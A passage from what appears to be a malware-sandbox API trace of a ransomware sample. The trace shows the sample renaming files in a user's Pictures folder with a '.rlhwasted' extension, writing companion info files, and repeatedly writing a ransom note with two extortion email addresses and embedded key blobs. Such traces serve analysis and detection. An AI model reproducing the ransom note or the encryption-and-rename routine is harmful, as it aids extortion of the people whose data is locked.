(in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.588] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.588] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\frN_rEyvxkVVxYzm.bmp.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\frn_reyvxkvvxyzm.bmp.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.589] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.590] SetEndOfFile (hFile=0x104) returned 1 [0196.590] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.590] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.590] lstrcpyW (in: lpString1=0x6e7a06, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\frN_rEyvxkVVxYzm.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\frn_reyvxkvvxyzm.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\frN_rEyvxkVVxYzm.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\frn_reyvxkvvxyzm.bmp.rlhwasted")) returned 1 [0196.591] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\frN_rEyvxkVVxYzm.bmp.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\frn_reyvxkvvxyzm.bmp.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.591] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.592] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x1c4d [0196.592] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1c4d) returned 0x6a0000 [0196.592] CloseHandle (hObject=0x108) returned 1 [0196.594] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.594] CloseHandle (hObject=0x128) returned 1 [0196.594] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.594] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.595] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.595] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.595] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.596] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.596] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.604] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.604] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.604] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.604] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jMJX4mF2DRDoU1cxniUrc11gwOUnvqNZU3A6IMV/MjSF5/kP655cbk4tDMiRJ8NN\r\n6yv9SuoVAGL9h58Cc9Jmce1bwj2hW6KMrQnlH7FzlMHjYBlkuKHzzvxQFeRGNlzm\r\n5yse/PBOxEMXMCZ9QJKkfHYuNViSBRMVTiPCywlquizNpJu/RS0Uvc5ndYxEluFU\r\n6h7D6gl/PN5A5bMVyHO1+6K9eSCCJWaSG3McytKiLQ8ihwc5n68KfM+dhkXEQa1r\r\nwW0t1dyaVIMWffpXdW6jjUSW1HTZLOIn1ou86HtD5Z5N6AwjTVjeNdlAEFv5buAu\r\nB2f/yR0LG68ataKL5laItLbF8Pjdfqfm5JY4Ae9hu+cwnLjm2RKYts5zEBNVJjr7\r\nl2zKGq3PuVLuFuVsLwT/wBopXP0FxI3qPPu5jq/KcPSddIUlXcpJVUQSWmfrWVv6\r\nvo1AXBn8/8Bhywtrbse2PApLuzn2J4COLsHA16QcS9VSSgXfGfNbP5dMO2skKkbQ\r\nOUQdNLV7if+eqsbSqHZ1XijueBcWHOzbd4zl7LmnC+u0SPDw3LuACNBNLS25uuQ8\r\nQgIzwL8W9lU255omFPJ1t2hmkyzpaUWKQmZs2IsRRjkwRqMMJjGaFtP+il2a1ZpS\r\n1u6670qAa+Im0XmrAzCCQIBui0z7ibXfT4sNFty7YvO=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.604] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.604] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.604] SetEndOfFile (hFile=0x104) returned 1 [0196.606] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.606] CloseHandle (hObject=0x104) returned 1 [0196.608] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.608] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f9938 | out: hHeap=0x6b0000) returned 1 [0196.608] _aulldvrm () returned 0x0 [0196.608] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.609] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.609] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.609] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\If9ZEE8.jpg") returned 54 [0196.609] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x276) returned 0x6e7988 [0196.609] lstrcpyW (in: lpString1=0x6e79f4, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.609] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.609] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.610] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.610] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.610] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\If9ZEE8.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\if9zee8.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.610] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.611] SetEndOfFile (hFile=0x104) returned 1 [0196.612] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.612] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.612] lstrcpyW (in: lpString1=0x6e79f4, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\If9ZEE8.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\if9zee8.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\If9ZEE8.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\if9zee8.jpg.rlhwasted")) returned 1 [0196.612] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\If9ZEE8.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\if9zee8.jpg.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0196.612] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0196.613] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x399d [0196.613] MapViewOfFile (hFileMappingObject=0x108, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x399d) returned 0x6a0000 [0196.613] CloseHandle (hObject=0x128) returned 1 [0196.615] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.615] CloseHandle (hObject=0x108) returned 1 [0196.615] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.615] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f6f10) returned 1 [0196.616] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.663] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.663] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f6f10) returned 1 [0196.664] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.664] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.672] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.672] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.672] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.672] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ldNfKKPA5nn5tFToALtoHuLcW/3tyKobirtRkXSCuNUoA/KCQAifz67T9eucSozS\r\nsqYD70us1fwjWi66L0+Zwe6Smzee6+9BqSVC6oQ9CfAlMZQ+6Yg/K1UeKEyRrb5r\r\nublPfj6RdT5ZsfUtkyodUIV5ShiRwX4pv7z3s0kUlx8DwsXmNWJKx4T6YFpPtPlT\r\n/T3VrPPUyTZl6VaXzAoBCLDKHd7eqC4VLorwSCsX+Cs6Ri+M00zpb1LLLMzsSWkY\r\n7kA3d0kM6r+UccvvCoUFinGpGl1ePWAOdsSw3IuJVTY4qzqDLqLp02JZeyc3ookb\r\nkN/t5Yg3LdZV0C+ojgKf2DqirTBXdr2YsU1X10mgOCbyqfTsdfX/DTxdDJhkMu7M\r\nAZ2pfph6jtBHlz6mDJqaRm4Ing8DAG5UgBbIo0OBqkHvPDrrMLd30dU8Tq20LaL/\r\nLlKEqHzdRpXwibWLfiarcJc7ELBZmbtb3odj440UL1soe1DatHdegrZp+XOSPIky\r\n7Rif7HkJNlos8utv02yN+n7GxXYsXvsl+WkRfFBwJ6ZD6/jw2UfIIaWUMO8Acl/B\r\n4FHgyRaCAT34DhHMQo3eW5iL5lrEqoEiEJjGSS7zQhlKPhELjGT1qVDOE9Rma9yQ\r\nk26s7P7hyRQDjWmYuoWWVf2SVbve96GF5z6yDWW4aOy=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.672] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.672] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.728] SetEndOfFile (hFile=0x104) returned 1 [0196.731] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.731] CloseHandle (hObject=0x104) returned 1 [0196.733] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.733] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f07e0 | out: hHeap=0x6b0000) returned 1 [0196.733] _aulldvrm () returned 0x0 [0196.733] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f4f10) returned 1 [0196.734] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.734] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.734] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\jx HTeq-8mJo87s.gif") returned 70 [0196.734] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x296) returned 0x6e7988 [0196.734] lstrcpyW (in: lpString1=0x6e7a14, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.734] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.734] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f4f10) returned 1 [0196.735] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x715c88 | out: pbBuffer=0x715c88) returned 1 [0196.735] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\jx HTeq-8mJo87s.gif.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\jx hteq-8mjo87s.gif.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.736] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.738] SetEndOfFile (hFile=0x104) returned 1 [0196.738] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.738] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.738] lstrcpyW (in: lpString1=0x6e7a14, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\jx HTeq-8mJo87s.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\jx hteq-8mjo87s.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\jx HTeq-8mJo87s.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\jx hteq-8mjo87s.gif.rlhwasted")) returned 1 [0196.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\jx HTeq-8mJo87s.gif.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\jx hteq-8mjo87s.gif.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0196.739] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0196.740] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x112fdd4 | out: lpFileSizeHigh=0x112fdd4*=0x0) returned 0x91d [0196.740] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91d) returned 0x6a0000 [0196.740] CloseHandle (hObject=0x108) returned 1 [0196.742] UnmapViewOfFile (lpBaseAddress=0x6a0000) returned 1 [0196.742] CloseHandle (hObject=0x128) returned 1 [0196.742] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0196.742] CryptAcquireContextW (in: phProv=0x112fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fdc4*=0x6f4f10) returned 1 [0196.743] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0196.743] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.743] CryptAcquireContextW (in: phProv=0x112fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fb2c*=0x6f4f10) returned 1 [0196.744] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x112fb48 | out: pbBuffer=0x112fb48) returned 1 [0196.744] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0196.755] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6e8978 [0196.755] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0196.755] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x715c88 [0196.755] _snwprintf (in: _Dest=0x715c88, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]k1uWiZQHPBiNisLrzqeRVj3FV1dKQm+l0JS4z9StreoreHNdFMfUCp5AZr03eEs5\r\nwYp0PpeyZmjrLXB6Y20RJq8BUN2jyKyCIAhaLRWhOl8KfSvsc5bc7VryDr8mVmOG\r\nb3UUVpumP3dtueW295PvfSnjbheckPVIs2a6+r5PQED7DBhI2lmhXcXIeX1gW34M\r\naSjDSuN6aWvbKNRUkBNmqAkPA/fSqSXZny/rS7+rKZHNwiQikweEGW8xFi8g1oT7\r\n09mfvuc7E28m5SNbXReR24bjCNZRQESWhi7xuk8PWSIr6q5R6U/mwZr4SF7NLMfC\r\nHwjN/Rx+XDZEAvfNjd6Aw1Q5oQisgGNp9Hu8nTzrRL7WmC1OiFeVZ+og8+70t4Og\r\nqzaZRkyiNNhgzS2ewrzBZJ+DSt/cx4AhuUqrg8m5i5vdKrhPhnHW6mhGZ7Fic+9z\r\nlZ+obwiaE8nJjDn5pO97KDjYoo6w//5/s8P0bQujfbUk90kuAjoeHsxWAP8AE7Pu\r\n5jvWdf3TFn2F/OYBnDtU7dxI9DdtNdsAM9Ew89SptdtJpoKYH79ssa8jFFSY+3eh\r\n8ZjI723iiAVSyJ2vMkFklh35kt+Kzi6c2Q+914zZva49OIdgo/7YSU4vmXNUnZw/\r\n0A2AS1GvW9ioo4OU1sCBPJGY1a3A0oIWPwTuPhTjGor=[end_key]\r\nKEEP IT\r\n") returned 981 [0196.755] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0196.755] WriteFile (in: hFile=0x104, lpBuffer=0x715c88*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x112fe38, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x112fe38*=0x7aa, lpOverlapped=0x0) returned 1 [0196.756] SetEndOfFile (hFile=0x104) returned 1 [0196.792] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0196.792] CloseHandle (hObject=0x104) returned 1 [0196.794] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7988 | out: hHeap=0x6b0000) returned 1 [0196.794] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70b1b8 | out: hHeap=0x6b0000) returned 1 [0196.794] _aulldvrm () returned 0x0 [0196.794] CryptAcquireContextW (in: phProv=0x112fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fe0c*=0x6f6f10) returned 1 [0196.795] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x112fe48 | out: pbBuffer=0x112fe48) returned 1 [0196.795] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\_sPYlooxTBwyz7_k.jpg") returned 71 [0196.795] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x298) returned 0x6e7988 [0196.795] lstrcpyW (in: lpString1=0x6e7a16, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0196.795] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0196.795] CryptAcquireContextW (in: phProv=0x112fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x112fde8*=0x6f6f10) returned 1 [0196.796] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0196.796] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0196.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\_sPYlooxTBwyz7_k.jpg.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\_spylooxtbwyz7_k.jpg.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x104 [0196.797] WriteFile (in: hFile=0x104, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x112fe04, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x112fe04*=0xa34, lpOverlapped=0x0) returned 1 [0196.798] SetEndOfFile (hFile=0x104) returned 1 [0196.798] SetFilePointer (in: hFile=0x104, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.798] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0196.798] lstrcpyW (in: lpString1=0x6e7a16, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0196.798] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\_sPYlooxTBwyz7_k.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\_spylooxtbwyz7_k.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VvYGyUs\\_sPYlooxTBwyz7_k.jpg.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vvygyus\\_spylooxtbwyz7_k.jpg.rlhwasted")) returned 1 [0196.799] CreateFileW 